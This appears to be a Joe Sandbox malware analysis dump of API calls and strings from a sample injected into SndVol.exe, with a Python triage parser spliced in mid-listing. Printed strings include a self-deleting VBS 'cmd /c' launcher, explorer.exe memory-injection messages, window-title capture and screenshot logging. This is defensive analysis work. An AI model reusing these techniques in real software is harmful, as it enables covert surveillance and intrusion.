                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                        • API String ID: 1332880857-3714951968
                                                                                                                        • Opcode ID: cf875154c78aa82dfb7ebe18e79e1a8ed71609db986d2ae6affda8c31fef5d3a
                                                                                                                        • Instruction ID: 6f61bf602d09a195580c134edc1ea67e2cb77acfbdc72deda7bdac190c2f6e39
                                                                                                                        • Opcode Fuzzy Hash: cf875154c78aa82dfb7ebe18e79e1a8ed71609db986d2ae6affda8c31fef5d3a
                                                                                                                        • Instruction Fuzzy Hash: 24812D311083559BD729EB10DC60EEFB7EAAFD4314F40482EA58A82195EF70AA5DCE52
                                                                                                                        APIs
                                                                                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0293CAE9
                                                                                                                        • GetCursorPos.USER32(?), ref: 0293CAF8
                                                                                                                        • SetForegroundWindow.USER32(?), ref: 0293CB01
                                                                                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0293CB1B
                                                                                                                        • Shell_NotifyIconA.SHELL32(00000002,02993B50), ref: 0293CB6C
                                                                                                                        • ExitProcess.KERNEL32 ref: 0293CB74
                                                                                                                        • CreatePopupMenu.USER32 ref: 0293CB7A
                                                                                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0293CB8F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                        • String ID: Close
                                                                                                                        • API String ID: 1657328048-3535843008
                                                                                                                        • Opcode ID: 5b5e0595b052fae971ccda46cdeb2a29a1bab259cd8514bf16f34b8fb18a1a57
                                                                                                                        • Instruction ID: 7f721e1511d2c29a03d48f2ed6b13b09c5ed643ebe86c446e93bc870c8eed65b
                                                                                                                        • Opcode Fuzzy Hash: 5b5e0595b052fae971ccda46cdeb2a29a1bab259cd8514bf16f34b8fb18a1a57
                                                                                                                        • Instruction Fuzzy Hash: 7F212F31988205FFEB065FA4ED0DEF97F79EB04701F044959F906A40A0D7B59934DB14
                                                                                                                        APIs
                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 029700B1
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F300
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F312
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F324
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F336
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F348
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F35A
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F36C
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F37E
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F390
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F3A2
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F3B4
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F3C6
                                                                                                                          • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F3D8
                                                                                                                        • _free.LIBCMT ref: 029700A6
                                                                                                                          • Part of subcall function 02966AC5: HeapFree.KERNEL32(00000000,00000000,?,0296FA50,00000000,00000000,00000000,00000000,?,0296FCF4,00000000,00000007,00000000,?,02970205,00000000), ref: 02966ADB
                                                                                                                          • Part of subcall function 02966AC5: GetLastError.KERNEL32(00000000,?,0296FA50,00000000,00000000,00000000,00000000,?,0296FCF4,00000000,00000007,00000000,?,02970205,00000000,00000000), ref: 02966AED
                                                                                                                        • _free.LIBCMT ref: 029700C8
                                                                                                                        • _free.LIBCMT ref: 029700DD
                                                                                                                        • _free.LIBCMT ref: 029700E8
                                                                                                                        • _free.LIBCMT ref: 0297010A
                                                                                                                        • _free.LIBCMT ref: 0297011D
                                                                                                                        • _free.LIBCMT ref: 0297012B
                                                                                                                        • _free.LIBCMT ref: 02970136
                                                                                                                        • _free.LIBCMT ref: 0297016E
                                                                                                                        • _free.LIBCMT ref: 02970175
                                                                                                                        • _free.LIBCMT ref: 02970192
                                                                                                                        • _free.LIBCMT ref: 029701AA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 161543041-0
                                                                                                                        • Opcode ID: c88da5a669ea8e65cfe4fbfbff65fae31cf4d0975901aab21e9a7947cbc57b53
                                                                                                                        • Instruction ID: 70f210fa5d40fe4222eb2a9420bf9f4ef44b8f7f81b395bc3513ffa748667258
                                                                                                                        • Opcode Fuzzy Hash: c88da5a669ea8e65cfe4fbfbff65fae31cf4d0975901aab21e9a7947cbc57b53
                                                                                                                        • Instruction Fuzzy Hash: D3312C31600705AFEB21AE39D848B6AB7FEAF80364F548419E459D7191EF36A994CF20
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: f37b5909f37a309916bcb53d930ff984d5a942188d65486073c6355e618d88ce
                                                                                                                        • Instruction ID: 2be3083dde772e75848c342fe623328e7b83c8714585b5dfbc926d4b226f117e
                                                                                                                        • Opcode Fuzzy Hash: f37b5909f37a309916bcb53d930ff984d5a942188d65486073c6355e618d88ce
                                                                                                                        • Instruction Fuzzy Hash: 5EC124B2D40209AFDB20DBA8DC46FEE77FDAB48700F144165FA09FB681D6709A419F64
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02974650: CreateFileW.KERNEL32(00000000,00000000,?,02974A2B,?,?,00000000,?,02974A2B,00000000,0000000C), ref: 0297466D
                                                                                                                        • GetLastError.KERNEL32 ref: 02974A96
                                                                                                                        • __dosmaperr.LIBCMT ref: 02974A9D
                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 02974AA9
                                                                                                                        • GetLastError.KERNEL32 ref: 02974AB3
                                                                                                                        • __dosmaperr.LIBCMT ref: 02974ABC
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02974ADC
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 02974C26
                                                                                                                        • GetLastError.KERNEL32 ref: 02974C58
                                                                                                                        • __dosmaperr.LIBCMT ref: 02974C5F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                        • String ID: H
                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                        • Opcode ID: 7d72f8aacbbacd778110a2108106750589a6948146f61969789506f7fd456e49
                                                                                                                        • Instruction ID: aaed67cbf902021428ad9ce7236b0a9c61df74912819e4a70a548139b1cf7f5f
                                                                                                                        • Opcode Fuzzy Hash: 7d72f8aacbbacd778110a2108106750589a6948146f61969789506f7fd456e49
                                                                                                                        • Instruction Fuzzy Hash: D5A13432A041458FCF19DF78D885BBE7BB5EB4A320F181159E815EB392DB318812CB55
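Working through a listing like the records above by hand is slow, so here is an added example (not part of the Joe Sandbox report and not Remcos code) of a small Python parser for these function records. It extracts each record's API calls (telling direct calls from the indented "Part of subcall function" lines) and Similarity fields, then tags the function with a capability label. The labels, and the rule that treats functions calling only LIBCMT as C-runtime noise, are this example's own assumptions; the sample input is a constructed, abbreviated excerpt of four records from the listing above (the getaddrinfo resolver, the Uninstall-key enumeration, the tray-icon menu and the _free cleanup). One triage caveat it encodes: the GetSystemDirectoryA/LoadLibraryA/GetProcAddress sequence that resolves getaddrinfo, getnameinfo and freeaddrinfo from wship6 and ws2_32 is the sequence the Windows SDK's wspiapi.h compatibility shim emits, so it is linked boilerplate rather than a malware-specific indicator, whereas the Uninstall-key walk reading DisplayName, DisplayVersion, InstallDate, InstallLocation, Publisher and UninstallString is a software inventory the sample collects.

```python
"""Parse Joe Sandbox IDA-plugin function records and tag them (added example, not report code)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed, abbreviated excerpt of four function records from the listing above.
SAMPLE = r"""APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02933E86
• LoadLibraryA.KERNEL32(?), ref: 02933EC8
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02933EE8
• FreeLibrary.KERNEL32(00000000), ref: 02933EEF
Similarity
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0293B846
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0293B88A
• RegCloseKey.ADVAPI32(?), ref: 0293BB54
Similarity
• String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
• API String ID: 1332880857-3714951968
• Instruction Fuzzy Hash: 24812D311083559BD729EB10DC60EEFB7EAAFD4314F40482EA58A82195EF70AA5DCE52
APIs
• TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0293CB1B
• Shell_NotifyIconA.SHELL32(00000002,02993B50), ref: 0293CB6C
• AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0293CB8F
Similarity
• String ID: Close
APIs
• ___free_lconv_mon.LIBCMT ref: 029700B1
  • Part of subcall function 0296F2E3: _free.LIBCMT ref: 0296F300
• _free.LIBCMT ref: 029700A6
  • Part of subcall function 02966AC5: HeapFree.KERNEL32(00000000,00000000,?,0296FA50,00000000), ref: 02966ADB
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
"""

# "• Name.MODULE(args), ref: ADDR"; indented "Part of subcall function X:" lines are calls made by a callee.
API_LINE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
                      r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Instruction Fuzzy Hash):\s*(?P<val>.*?)\s*$")
CRT_MODULES = {"LIBCMT", "LIBCMTD", "MSVCRT"}  # assumption: compiler runtime, not malware logic

@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    caller: str  # "" for a direct call, else the address of the subcall that makes it

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    def strings(self) -> List[str]:
        # Joe Sandbox joins strings with '$'; a string that itself contains '$' is ambiguous here.
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    def direct_apis(self) -> set:
        return {a.name for a in self.apis if not a.caller}

def parse_listing(text: str) -> List[FunctionRecord]:
    """Each 'APIs' header starts a new function record; bullets below it are calls or fields."""
    records: List[FunctionRecord] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append(FunctionRecord())
        elif records and (m := API_LINE.match(line)):
            records[-1].apis.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["caller"] or ""))
        elif records and (m := FIELD_LINE.match(line)):
            records[-1].fields[m["key"]] = m["val"]
    return records

def classify(rec: FunctionRecord) -> List[str]:
    """Heuristic capability tags: this example's own rules, keyed on the APIs and strings above."""
    direct, strings = rec.direct_apis(), set(rec.strings())
    tags = []
    if direct and {a.module for a in rec.apis if not a.caller} <= CRT_MODULES:
        tags.append("crt-runtime-noise")
    if {"RegOpenKeyExA", "RegEnumKeyExA"} <= direct and any("Uninstall" in s for s in strings):
        tags.append("installed-software-inventory")
    if {"LoadLibraryA", "GetProcAddress"} <= direct:
        # wship6/ws2_32 plus getaddrinfo is the Windows SDK wspiapi.h shim: linked boilerplate, not an IOC.
        shim = "getaddrinfo" in strings and strings & {r"\wship6", r"\ws2_32"}
        tags.append("winsock-getaddrinfo-shim" if shim else "dynamic-api-resolution")
    if {"Shell_NotifyIconA", "TrackPopupMenu"} <= direct:
        tags.append("tray-icon-ui")
    if {"GetForegroundWindow", "GetWindowTextW"} <= direct:
        tags.append("foreground-window-title-capture")
    return tags

def interesting(records: List[FunctionRecord]) -> List[FunctionRecord]:
    """Drop functions that are nothing but C-runtime housekeeping."""
    return [r for r in records if classify(r) != ["crt-runtime-noise"]]
```

Feed the full listing to parse_listing and iterate over interesting(...) to get one line per function with its tags, direct API names and API String ID; the subcall lines are kept on each record but excluded from classification, so a function is judged by what it calls itself, not by what its CRT helpers do.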
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0292A456
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 0292A461
                                                                                                                        • GetForegroundWindow.USER32 ref: 0292A467
                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 0292A470
                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0292A4A4
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0292A574
                                                                                                                          • Part of subcall function 02929D58: SetEvent.KERNEL32(?,?,00000000,0292A91C,00000000), ref: 02929D84
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                        • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                        • API String ID: 911427763-3954389425
                                                                                                                        • Opcode ID: fddf8c950492ad214c0daeaec4de48cc9bf283e27eabee9ca3e8ecd41831d9be
                                                                                                                        • Instruction ID: c6d1946e4be3b980aca219754e67d0c6956f6828c604f7d5d285b9355492bc81
                                                                                                                        • Opcode Fuzzy Hash: fddf8c950492ad214c0daeaec4de48cc9bf283e27eabee9ca3e8ecd41831d9be
                                                                                                                        • Instruction Fuzzy Hash: 985113726083205BD719FB24D854A7FB7DAAFC4324F80092CF84A861D8DF609E4DCB92
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02931699: TerminateProcess.KERNEL32(00000000,pth_unenc,0292E670), ref: 029316A9
                                                                                                                          • Part of subcall function 02931699: WaitForSingleObject.KERNEL32(000000FF), ref: 029316BC
                                                                                                                          • Part of subcall function 0293265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,029942F8), ref: 02932679
                                                                                                                          • Part of subcall function 0293265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 02932692
                                                                                                                          • Part of subcall function 0293265D: RegCloseKey.ADVAPI32(00000000), ref: 0293269D
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0292C6C7
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,02985900,02985900,00000000), ref: 0292C826
                                                                                                                        • ExitProcess.KERNEL32 ref: 0292C832
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                        • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                        • API String ID: 1913171305-2411266221
                                                                                                                        • Opcode ID: e2eb314d868eb419cfed8c95b07a3179a220abf034a34d55282b6808568251cf
                                                                                                                        • Instruction ID: a8db4891c9e56a5befec2d34356d02a9372eaeedc70d5d4bfc32ac401d5256fe
                                                                                                                        • Opcode Fuzzy Hash: e2eb314d868eb419cfed8c95b07a3179a220abf034a34d55282b6808568251cf
                                                                                                                        • Instruction Fuzzy Hash: 13414F32D001285ADB19F7A0DC55DFFB77AAFE1710F40016AE40AA7099EF606E5ECE94
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02921AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 029593B9
                                                                                                                        • GetLastError.KERNEL32(?,?,02921AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 029593C6
                                                                                                                        • __dosmaperr.LIBCMT ref: 029593CD
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02921AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 029593F9
                                                                                                                        • GetLastError.KERNEL32(?,?,?,02921AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02959403
                                                                                                                        • __dosmaperr.LIBCMT ref: 0295940A
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,02921AD8,?), ref: 0295944D
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,02921AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02959457
                                                                                                                        • __dosmaperr.LIBCMT ref: 0295945E
                                                                                                                        • _free.LIBCMT ref: 0295946A
                                                                                                                        • _free.LIBCMT ref: 02959471
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2441525078-0
                                                                                                                        • Opcode ID: 5e4308c3c6dbdd3713b45bd14543de28a010f559b3df563a8cb01066f30c8c96
                                                                                                                        • Instruction ID: db9b6a4516a30946e95b58c4749ff2aae7b4fe2ba9ab7ed53327c4655a548cd9
                                                                                                                        • Opcode Fuzzy Hash: 5e4308c3c6dbdd3713b45bd14543de28a010f559b3df563a8cb01066f30c8c96
                                                                                                                        • Instruction Fuzzy Hash: BC31BD72A0822AFBEF11AFA4DC48DBE7BBDAF40364B040158F81496280DB358D11DBA0
                                                                                                                        APIs
                                                                                                                        • SetEvent.KERNEL32(?,?), ref: 02924E71
                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02924F21
                                                                                                                        • TranslateMessage.USER32(?), ref: 02924F30
                                                                                                                        • DispatchMessageA.USER32(?), ref: 02924F3B
                                                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,02993F80), ref: 02924FF3
                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0292502B
                                                                                                                          • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                        • API String ID: 2956720200-749203953
                                                                                                                        • Opcode ID: 2c0d296f85e59cf23f8e131a118a1bab53f5a42707cff4ff2030ef4f312be2de
                                                                                                                        • Instruction ID: 0bd4ed57d48bb64e1ec7050fe2e34d75750b4f366d6a05dc9bbfadda1fb60549
                                                                                                                        • Opcode Fuzzy Hash: 2c0d296f85e59cf23f8e131a118a1bab53f5a42707cff4ff2030ef4f312be2de
                                                                                                                        • Instruction Fuzzy Hash: 10418072A083119BCB14FB78D8548AE77EAAFC5710F40092DF91A87198EF34D91DCB92
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 0293912D
                                                                                                                        • GdiplusStartup.GDIPLUS(02993AF0,?,00000000), ref: 0293915F
                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 029391EB
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0293926D
                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 0293927C
                                                                                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 02939365
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                        • API String ID: 489098229-3790400642
                                                                                                                        • Opcode ID: 502d1e17ab3c51041f40dd747b42f52e60875f39c98c082167adff496b4224ed
                                                                                                                        • Instruction ID: e77c60a1fe3b457b0a332866aead998b0aadae771ee9541a01ee9efa1918a341
                                                                                                                        • Opcode Fuzzy Hash: 502d1e17ab3c51041f40dd747b42f52e60875f39c98c082167adff496b4224ed
                                                                                                                        • Instruction Fuzzy Hash: 1951C071E002649BDF19FBB4DC54AFEBBBAAF90300F440469E04AA7185EF745E59CB90
                                                                                                                        APIs
                                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,02975DAF), ref: 0297515C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DecodePointer
                                                                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                        • API String ID: 3527080286-3064271455
                                                                                                                        • Opcode ID: ffb79bd87ec54564bb4b574888814292e486aac73d4ca516e762a8aab9c74dd8
                                                                                                                        • Instruction ID: 111e57ef8d2bb19fa4f7c635a78be7149e11e0a155dac159876fe4b5efc793a6
                                                                                                                        • Opcode Fuzzy Hash: ffb79bd87ec54564bb4b574888814292e486aac73d4ca516e762a8aab9c74dd8
                                                                                                                        • Instruction Fuzzy Hash: F7517F70A0060ECBCF94DFA8DA4C5ADBBF8FF49314F9605C5D881AB264CB758924CB18
                                                                                                                        APIs
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0293665C
                                                                                                                          • Part of subcall function 0293B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02929F65), ref: 0293B633
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 02936688
                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 029366BC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                        • API String ID: 1462127192-2001430897
                                                                                                                        • Opcode ID: 59960c4c0bac455a15bad6c850fbbb51e08db0a7a3ed0c6de63ad31a047d91a3
                                                                                                                        • Instruction ID: f4a244f8d362b3ecb663d47ed8b13b5e24a97545ceccfdfabb1215a894f81d55
                                                                                                                        • Opcode Fuzzy Hash: 59960c4c0bac455a15bad6c850fbbb51e08db0a7a3ed0c6de63ad31a047d91a3
                                                                                                                        • Instruction Fuzzy Hash: 723165319401299BDB18FBA0DCA1EFE777AAFD0714F040159E40A670D9EF705A8ECE94
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(02994A28,00000000,029942E0,00003000,00000004,00000000,00000001), ref: 02926647
                                                                                                                        • GetCurrentProcess.KERNEL32(02994A28,00000000,00008000,?,00000000,00000001,00000000,029268BB,C:\Windows\SysWOW64\SndVol.exe), ref: 02926705
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentProcess
                                                                                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                        • API String ID: 2050909247-4242073005
                                                                                                                        • Opcode ID: bfcdc23b9d25a66aa7fa805280b555dd41ead34ef0c035b82f89cc3182beb24e
                                                                                                                        • Instruction ID: 21484231d52b33e14e0a406eae7f6a02e1854b5b5b40b2aa2685196aa1b3318d
                                                                                                                        • Opcode Fuzzy Hash: bfcdc23b9d25a66aa7fa805280b555dd41ead34ef0c035b82f89cc3182beb24e
                                                                                                                        • Instruction Fuzzy Hash: 0A31E571A44300AFE311BB68EC44F7A77AEFB84726F41481CF54582988E77094199F28
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0293C988
  • Part of subcall function 0293CA1F: RegisterClassExA.USER32(00000030), ref: 0293CA6C
  • Part of subcall function 0293CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0293CA87
  • Part of subcall function 0293CA1F: GetLastError.KERNEL32 ref: 0293CA91
• ExtractIconA.SHELL32(00000000,?,00000000), ref: 0293C9BF
